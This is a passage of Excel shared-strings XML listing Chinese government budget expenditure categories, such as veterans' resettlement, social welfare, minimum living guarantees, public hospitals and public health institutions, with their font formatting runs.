    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>烈士纪念设施管理维护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他优抚支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>退役安置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>退役士兵安置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>军队移交政府的离退休人员安置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>军队移交政府离退休干部管理机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>退役士兵管理教育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>军队转业干部安置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他退役安置支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>社会福利</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>儿童福利</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>老年福利</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>康复辅具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>殡葬</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>社会福利事业单位</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>养老服务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他社会福利支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>残疾人事业</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>残疾人康复</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>残疾人就业</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>残疾人体育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>残疾人生活和护理补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他残疾人事业支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>红十字事业</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他红十字事业支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>最低生活保障</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>城市最低生活保障金支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农村最低生活保障金支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>临时救助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>临时救助支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>流浪乞讨人员救助支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>特困人员救助供养</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>城市特困人员救助供养支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农村特困人员救助供养支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>补充道路交通事故社会救助基金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>交强险增值税补助基金支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>交强险罚款收入补助基金支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他生活救助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他城市生活救助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他农村生活救助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>财政对基本养老保险基金的补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>财政对企业职工基本养老保险基金的补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>财政对城乡居民基本养老保险基金的补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>财政对其他基本养老保险基金的补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>财政对其他社会保险基金的补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>财政对失业保险基金的补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>财政对工伤保险基金的补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他财政对社会保险基金的补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>退役军人管理事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>拥军优属</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>军供保障</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他退役军人事务管理支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>财政代缴社会保险费支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>财政代缴城乡居民基本养老保险费支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>财政代缴其他社会保险费支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他社会保障和就业支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他社会保障和就业支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>卫生健康支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>卫生健康管理事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他卫生健康管理事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>公立医院</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>综合医院</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>中医</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>民族</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>医院</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>传染病医院</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>职业病防治医院</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>精神病医院</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>妇幼保健医院</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>儿童医院</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他专科医院</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>福利医院</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>行业医院</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>处理医疗欠费</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>康复医院</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>优抚医院</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他公立医院支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>基层医疗卫生机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>城市社区卫生机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>乡镇卫生院</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他基层医疗卫生机构支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>公共卫生</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>疾病预防控制机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>卫生监督机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>妇幼保健机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>精神卫生机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>应急救治机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>采供血机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他专业公共卫生机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
